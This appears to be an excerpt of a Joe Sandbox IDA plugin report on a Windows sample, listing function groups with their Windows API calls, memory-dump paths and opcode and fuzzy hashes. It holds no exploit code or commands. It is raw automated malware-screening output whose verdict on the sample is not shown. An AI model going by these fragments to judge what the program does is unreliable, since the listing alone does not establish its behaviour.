                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                        • String ID:
                                                        • API String ID: 173952441-0
                                                        • Opcode ID: 7e2b4f74ebeca40e609a52cb6a36393b4a376e25e46ba7e7a199bcf6014047ca
                                                        • Instruction ID: a9ba343605694bdd57d1f714f1e1bde960490ec77ed3be5f4be23de069d13b74
                                                        • Opcode Fuzzy Hash: 7e2b4f74ebeca40e609a52cb6a36393b4a376e25e46ba7e7a199bcf6014047ca
                                                        • Instruction Fuzzy Hash: CF01D276805208BBDB215BA5DC09FFA7A6FDF81331F20422DFA25922D0CB75CA01D7A5
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
                                                        • GetStockObject.GDI32(00000011), ref: 006A6060
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID:
                                                        • API String ID: 3970641297-0
                                                        • Opcode ID: 5ea2ad4a1915ea601ca66d4db86ece266ade7542b7199030d30dfa3f09aa92b0
                                                        • Instruction ID: ab184efe63ce1a2bab8293ef35adbb6ad91f23feb617a32087b4c7560d529f16
                                                        • Opcode Fuzzy Hash: 5ea2ad4a1915ea601ca66d4db86ece266ade7542b7199030d30dfa3f09aa92b0
                                                        • Instruction Fuzzy Hash: 7211AD72101548BFEF125FA4CD44EEABB6AEF093A5F084205FA1462120C7369CA0EFA0
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 006C3B56
                                                          • Part of subcall function 006C3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006C3AD2
                                                          • Part of subcall function 006C3AA3: ___AdjustPointer.LIBCMT ref: 006C3AED
                                                        • _UnwindNestedFrames.LIBCMT ref: 006C3B6B
                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 006C3B7C
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 006C3BA4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                        • String ID:
                                                        • API String ID: 737400349-0
                                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                        • Instruction ID: 55cb905d6de44418e566d85ad83751043889f8ca63a1a9611b40e0da82845818
                                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                        • Instruction Fuzzy Hash: 60011732100148BBDF129E95CC42EEB3B6EEF58754F04801CFE4896221C632E9619BA4
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006A13C6,00000000,00000000,?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue), ref: 006D30A5
                                                        • GetLastError.KERNEL32(?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue,00742290,FlsSetValue,00000000,00000364,?,006D2E46), ref: 006D30B1
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue,00742290,FlsSetValue,00000000), ref: 006D30BF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: e597fe5e62e06e562f9e0594dfd7d4fae314687b7264613e4546f391bcba642b
                                                        • Instruction ID: edd2abc9aee5fe55d9f69aba9c4503bcc2604d87a9ae14280b7b4d9d1dd34b29
                                                        • Opcode Fuzzy Hash: e597fe5e62e06e562f9e0594dfd7d4fae314687b7264613e4546f391bcba642b
                                                        • Instruction Fuzzy Hash: 30012B32B01332ABDB314B78AC449977B9AAF45BA1B144621F905F3340C725D901C7E5
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0070747F
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00707497
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007074AC
                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007074CA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: 6d1567be12768acec095c2abfc6ca679bb89b66d0e84741a46ab2091b8faa430
                                                        • Instruction ID: f20017c2cd0a21f5da66b260f78f5a117a39ab113914098605e7c7b22555c907
                                                        • Opcode Fuzzy Hash: 6d1567be12768acec095c2abfc6ca679bb89b66d0e84741a46ab2091b8faa430
                                                        • Instruction Fuzzy Hash: E211ADB5A05394EBF7208F14EC08B927FFCEB00B14F108669B656E6191D7B8F904DB60
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0C4
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0E9
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0F3
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B126
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: a9fb99f5097d2894675ade070509fc051c3149b9fbc73718ef788bd10052e62c
                                                        • Instruction ID: 0b2c0422e17d6ef115876d7dc00a661382cb1836530c4f3ca71b4c57bceff1bb
                                                        • Opcode Fuzzy Hash: a9fb99f5097d2894675ade070509fc051c3149b9fbc73718ef788bd10052e62c
                                                        • Instruction Fuzzy Hash: CC118471C0151CD7DF009FE4D9596EEBFB8FF09711F108185D941B2181CB385A50DB55
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00702DC5
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00702DD6
                                                        • GetCurrentThreadId.KERNEL32 ref: 00702DDD
                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00702DE4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 8212fda1a2ff21b1d632b69b5ab4c4a5551e28113e5fe18a940c64bb2e3f6dea
                                                        • Instruction ID: 02bfa9d0bdbf2e4fe957939f8c9f060981df0cff9d479c62a1d2a538034b92a0
                                                        • Opcode Fuzzy Hash: 8212fda1a2ff21b1d632b69b5ab4c4a5551e28113e5fe18a940c64bb2e3f6dea
                                                        • Instruction Fuzzy Hash: 2EE09272201224FBEB211B729C0FFEB3EACEF42BA2F004115F105E10819AA8C841C7B1
                                                        APIs
                                                          • Part of subcall function 006B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
                                                          • Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96A2
                                                          • Part of subcall function 006B9639: BeginPath.GDI32(?), ref: 006B96B9
                                                          • Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96E2
                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00738887
                                                        • LineTo.GDI32(?,?,?), ref: 00738894
                                                        • EndPath.GDI32(?), ref: 007388A4
                                                        • StrokePath.GDI32(?), ref: 007388B2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: 0c5e8b587a6ed49cd5ae2d23818e9cb5e35bfbce6b9f63c52e6a763fa4a63347
                                                        • Instruction ID: 8eec4a073444d2d3fff57d012b1bbc74a0a9df9a9f22f90607adb9cee09bdd28
                                                        • Opcode Fuzzy Hash: 0c5e8b587a6ed49cd5ae2d23818e9cb5e35bfbce6b9f63c52e6a763fa4a63347
                                                        • Instruction Fuzzy Hash: FBF03A36045698BAEB135FA8AC09FCA3B69AF06311F44C000FB12751E2C7795551DFA9
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 006B98CC
                                                        • SetTextColor.GDI32(?,?), ref: 006B98D6
                                                        • SetBkMode.GDI32(?,00000001), ref: 006B98E9
                                                        • GetStockObject.GDI32(00000005), ref: 006B98F1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Color$ModeObjectStockText
                                                        • String ID:
                                                        • API String ID: 4037423528-0
                                                        • Opcode ID: 2a41c673396df09ed3783340c870f523bb16b5ead75e28fb3f5589f167298d88
                                                        • Instruction ID: 04af1a20d3a586305edd793162be9faf7095f4bed8262a695bf49f33e2f2e153
                                                        • Opcode Fuzzy Hash: 2a41c673396df09ed3783340c870f523bb16b5ead75e28fb3f5589f167298d88
                                                        • Instruction Fuzzy Hash: 1EE06571244248AAEB225B74AC09BE83F51AB11336F14C219F7F5641E1C77646509B10
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00701634
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,007011D9), ref: 0070163B
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007011D9), ref: 00701648
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,007011D9), ref: 0070164F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: 50767dcca5e92bfe05ae0758b8a23f5a84c848f36bd1bd2bf3aafd09a7d2f003
                                                        • Instruction ID: 7dc8b0f16886b695d5dd9cba436ebc7a642361c0cc47068848f1b66d2a0d3002
                                                        • Opcode Fuzzy Hash: 50767dcca5e92bfe05ae0758b8a23f5a84c848f36bd1bd2bf3aafd09a7d2f003
                                                        • Instruction Fuzzy Hash: FBE08C72602211EBE7201FA0AE0DB873BBCAF44793F14C808F245E9080EB3D8444CB68
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 006FD858
                                                        • GetDC.USER32(00000000), ref: 006FD862
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FD882
                                                        • ReleaseDC.USER32(?), ref: 006FD8A3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 3ece94bd57b17d5a8f4072df4cf53a6f6cdbcd7a45fc5fca08de0bf7cc6a66de
                                                        • Instruction ID: f5f5fc4ad36d06a530f72a7a13abaae68169aff388d09403a812d63e302e9392
                                                        • Opcode Fuzzy Hash: 3ece94bd57b17d5a8f4072df4cf53a6f6cdbcd7a45fc5fca08de0bf7cc6a66de
                                                        • Instruction Fuzzy Hash: 24E01AB1800204EFDB42AFA0D80D66DBBB2FB08312F10C009F946F7260C73D9942AF44
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 006FD86C
                                                        • GetDC.USER32(00000000), ref: 006FD876
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FD882
                                                        • ReleaseDC.USER32(?), ref: 006FD8A3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 33a6034bc7d28313913e6f958dd6ec4f833f5941a7932fce9e9c97da1c2eef1c
                                                        • Instruction ID: 06053dd8a283a46042be5f26486f9f8030e6ca08c2904ad3db02b4296109c6cc
                                                        • Opcode Fuzzy Hash: 33a6034bc7d28313913e6f958dd6ec4f833f5941a7932fce9e9c97da1c2eef1c
                                                        • Instruction Fuzzy Hash: FAE01AB1800200DFDB42AFA0D80D66DBBB2BB08312F108008F946F7260C73D99019F44
                                                        APIs
                                                          • Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625
                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00714ED4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Connection_wcslen
                                                        • String ID: *$LPT
                                                        • API String ID: 1725874428-3443410124
                                                        • Opcode ID: 99adfc999786badfdc1bb7b82f784dcaecd61cd71b5cd97843932cb98e709560
                                                        • Instruction ID: 380d792099f740d35a200d0cdd7255964960e6ab881e309ca01922026dbfb50d
                                                        • Opcode Fuzzy Hash: 99adfc999786badfdc1bb7b82f784dcaecd61cd71b5cd97843932cb98e709560
                                                        • Instruction Fuzzy Hash: E2914F75A002049FDB14DF58C484EA9BBF5BF49314F19809DE80A9F3A2D735EE86CB91
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 006CE30D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: 8739af0257dc86b25a4d7807a658649d64bd2f55c0986f66fdd62dcc056fcae8
                                                        • Instruction ID: d0699a20efbd56ded19ee46f85ee4a60b0237fe4a4f69d456a7cd55e7b5d96e0
                                                        • Opcode Fuzzy Hash: 8739af0257dc86b25a4d7807a658649d64bd2f55c0986f66fdd62dcc056fcae8
                                                        • Instruction Fuzzy Hash: A9512C61E0C20196CB157714C901BF93BB7DF40740F748D5EF495423A9FB3A8D969A8B
                                                        APIs
                                                        • CharUpperBuffW.USER32(006F569E,00000000,?,0073CC08,?,00000000,00000000), ref: 007278DD
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                        • CharUpperBuffW.USER32(006F569E,00000000,?,0073CC08,00000000,?,00000000,00000000), ref: 0072783B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper$_wcslen
                                                        • String ID: <sv
                                                        • API String ID: 3544283678-1866742746
                                                        • Opcode ID: 88d45d258526cd439283dcb177838b9d19270bbd82080984e9992a6df935aac5
                                                        • Instruction ID: 2719ef12dbf4142b5d545e4ae0fa7c60a60d5c05b4627e4333154bc40ddd2099
                                                        • Opcode Fuzzy Hash: 88d45d258526cd439283dcb177838b9d19270bbd82080984e9992a6df935aac5
                                                        • Instruction Fuzzy Hash: 57614B72914228AACF48FBE4DD91DFDB379BF15300B444129F542A7191EF38AE49CBA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        • Opcode ID: ff2f4bf432a8d9bfe4132cc2001fc11cfe91351041b8c99175a16080483e32e8
                                                        • Instruction ID: d498d0343c4267ab09f3b0037ba25a3556cdfb5c41fc35754e43c592c5d0c357
                                                        • Opcode Fuzzy Hash: ff2f4bf432a8d9bfe4132cc2001fc11cfe91351041b8c99175a16080483e32e8
                                                        • Instruction Fuzzy Hash: B651357550424ADFDB15EF28C4816FA7FA6EF15310F248069F9519B3E0D6369E83CBA0
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 006BF2A2
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 006BF2BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 8a3460f0d368455acd96c9631a9675e70b5470ff22ccae4e73a992ff0629645b
                                                        • Instruction ID: 47adc3b50507cccab70cc0f8a9a120fe0df1137806193d7eedc84049402fbd54
                                                        • Opcode Fuzzy Hash: 8a3460f0d368455acd96c9631a9675e70b5470ff22ccae4e73a992ff0629645b
                                                        • Instruction Fuzzy Hash: 7E5155714087449FD360AF10DC86BABBBF9FFC5311F81884CF199411A5EB709929CB6A
